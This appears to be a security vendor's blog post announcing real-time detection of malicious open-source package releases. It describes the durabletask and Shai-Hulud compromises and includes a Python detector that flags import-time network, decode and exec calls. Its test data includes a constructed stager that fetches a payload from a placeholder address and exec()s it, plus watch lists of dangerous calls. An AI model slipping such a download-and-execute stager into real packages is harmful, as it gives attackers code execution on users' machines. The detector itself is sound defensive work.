Upwind Now Detects Novel Supply Chain Attacks in Real Time
Software supply chain attacks are no longer rare events that make headlines once a quarter. In 2026, significant attacks are landing every few days, and the pace is accelerating. AI-assisted code generation is lowering the barrier for attackers to craft sophisticated, obfuscated payloads and inject them into trusted open source packages at scale. The window between a malicious package being published and it reaching production systems has collapsed to minutes.
Today, we’re announcing a new Upwind capability purpose-built for this reality: real-time supply chain attack detection across the open-source ecosystem.

How It Works
Upwind now continuously monitors the repositories and distribution channels for every open-source package our customers depend on. This spans Git repositories, npm, PyPI, Packagist (PHP), Go modules, RubyGems, and other major registries. When a new package version is published, Upwind automatically analyzes it for suspicious or malicious behavior and alerts within minutes.
The capability identifies malicious package releases regardless of how they were introduced, helping organizations detect emerging supply chain threats before they spread into production environments.

Catching the durabletask Compromise in 10 Minutes
The system proved itself immediately. On May 19, Upwind detected that three new versions of Microsoft’s durabletask Python SDK (1.4.1, 1.4.2, and 1.4.3) had been published with injected malicious code. The compromised versions included import-time code that downloaded and executed a remote payload (so simply installing and importing the package was enough to trigger it; no SDK function had to be called), a Linux binary designed for multi-cloud credential theft, and a destructive wiper targeting Israeli and Iranian systems.
Upwind’s detection fired within 10 minutes of the first malicious package being uploaded to PyPI. Our research team reported the compromise directly to Microsoft through a public GitHub issue, and the affected versions were subsequently yanked from PyPI.
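To make the "analyze the new release" step from How It Works concrete, here is an added example (written for this post, not Upwind's detection code): it walks the statements a Python module runs at import time, resolves import aliases so that `from urllib.request import urlopen as _u` still counts as a network call, and reports only the watch-listed behaviour that the new release adds relative to the previous one. The two module sources it checks are constructed for this example and are not the real durabletask code; the watch lists and the placeholder address are assumptions.

```python
"""Added example (not Upwind's code): flag import-time download-and-execute
behaviour that a new package release introduces relative to the previous one."""
import ast

# Call targets worth attention when they run at import time. Matched on the
# resolved dotted name, e.g. "urllib.request.urlopen" or "subprocess.Popen".
NETWORK = {"urllib.request.urlopen", "urllib.request.urlretrieve",
           "requests.get", "requests.post", "socket.create_connection"}
EXECUTE = {"exec", "eval", "os.system", "os.popen", "subprocess.run",
           "subprocess.Popen", "subprocess.call", "subprocess.check_output",
           "ctypes.CDLL"}
DECODE = {"base64.b64decode", "base64.b85decode", "zlib.decompress",
          "marshal.loads"}
WATCHLIST = NETWORK | EXECUTE | DECODE


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None (e.g. for f().g)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def import_time_calls(source):
    """Return [(lineno, resolved_call)] for watch-listed calls that execute on
    import. Function and lambda bodies are skipped (they run only when called);
    decorators, class bodies and try/if/for/with blocks are walked because they
    do run at import. Aliases seen along the way are resolved so that renaming
    a dangerous call does not hide it."""
    aliases = {}
    found = []

    def resolve(name):
        head, _, rest = name.partition(".")
        head = aliases.get(head, head)
        return f"{head}.{rest}" if rest else head

    def visit(node):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
        elif isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            for dec in node.decorator_list:   # decorators run at import time
                visit(dec)
            return
        elif isinstance(node, ast.Lambda):
            return
        elif isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name is not None and resolve(name) in WATCHLIST:
                found.append((node.lineno, resolve(name)))
        for child in ast.iter_child_nodes(node):
            visit(child)

    visit(ast.parse(source))
    return found


def new_findings(previous_source, new_source):
    """Findings present in the new release but absent from the previous one, so
    a package's long-standing use of e.g. subprocess does not alert on every
    release; only behaviour the release adds does."""
    known = {name for _, name in import_time_calls(previous_source)}
    return [(ln, name) for ln, name in import_time_calls(new_source)
            if name not in known]


def classify(findings):
    """One-line verdict for the alert, worst combination first."""
    names = {name for _, name in findings}
    if names & NETWORK and names & EXECUTE:
        return "critical: import-time download-and-execute"
    if names & DECODE and names & EXECUTE:
        return "high: import-time decode-and-execute"
    if names:
        return "review: new import-time " + ", ".join(sorted(names))
    return "clean"


# Constructed samples (not real package code). The previous release only uses
# subprocess inside a function; the new release adds a try-wrapped, aliased
# stager that fetches and exec()s a payload the moment the package is imported.
PREVIOUS = '''
import subprocess
from .client import TaskClient
__version__ = "0.1.0"
def run_cli(args):
    return subprocess.run(args, check=True)
'''

NEW = '''
from .client import TaskClient
__version__ = "0.1.1"
try:
    from urllib.request import urlopen as _u
    import base64 as _b
    _blob = _u("http://203.0.113.9/s1").read()   # TEST-NET-3 placeholder
    exec(_b.b64decode(_blob))
except Exception:
    pass
def run_cli(args):
    import subprocess
    return subprocess.run(args, check=True)
'''

if __name__ == "__main__":
    findings = new_findings(PREVIOUS, NEW)
    for lineno, name in findings:
        print(f"line {lineno}: {name}")
    print(classify(findings))
```

Diffing against the prior release is the part that keeps this usable at registry scale: a package that has always shelled out will not page anyone, while a release that newly combines a network fetch with `exec` at import time is exactly the shape of the durabletask compromise described above. A real pipeline would run the same logic over every file in the sdist and wheel, not just one module, and treat new `setup.py` or build-hook code with the same suspicion.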

Shai-Hulud: A Worm That Infected 20 Packages in One Shot
The durabletask incident was far from isolated. In the same week, Upwind tracked the continued evolution of the Shai-Hulud campaign, a self-propagating supply chain worm that first appeared in intercom-client 7.0.4 in late April, when the compromised Intercom Node SDK turned a routine npm install into immediate remote code execution.

By May 11, the same operator had scaled the attack dramatically. Twenty TanStack packages, including widely used routers for React, Vue, and Solid, were simultaneously compromised with a 2.3 MB obfuscated stealer. The worm harvested AWS, Vault, Kubernetes, GitHub, and npm credentials, scraped secrets from CI runner memory, and used stolen OIDC tokens to self-propagate across the entire TanStack ecosystem in a single operation.
The attacker didn’t need to compromise 20 maintainers individually. One foothold in the publishing pipeline was enough to infect everything.

The New Normal Demands a New Speed
A year ago, a major supply chain attack was a quarterly event. Today, Upwind’s research team is tracking significant incidents every few days across npm, PyPI, and multiple ecosystems simultaneously. AI tools are making it easier for attackers to generate convincing, obfuscated malicious code and to contribute it at scale.
The gap between when a malicious package is published and when it starts executing in real environments is now measured in minutes. Traditional vulnerability databases and periodic scanning simply cannot keep up. Detection needs to operate at the same speed as the attack.
That is what this capability delivers: continuous monitoring of every registry your dependencies come from, real-time diff analysis of each new release against the previous one, and immediate alerting, catching supply chain attacks before they reach your production systems.
To stay up to date with the latest threat findings, follow us on X or LinkedIn.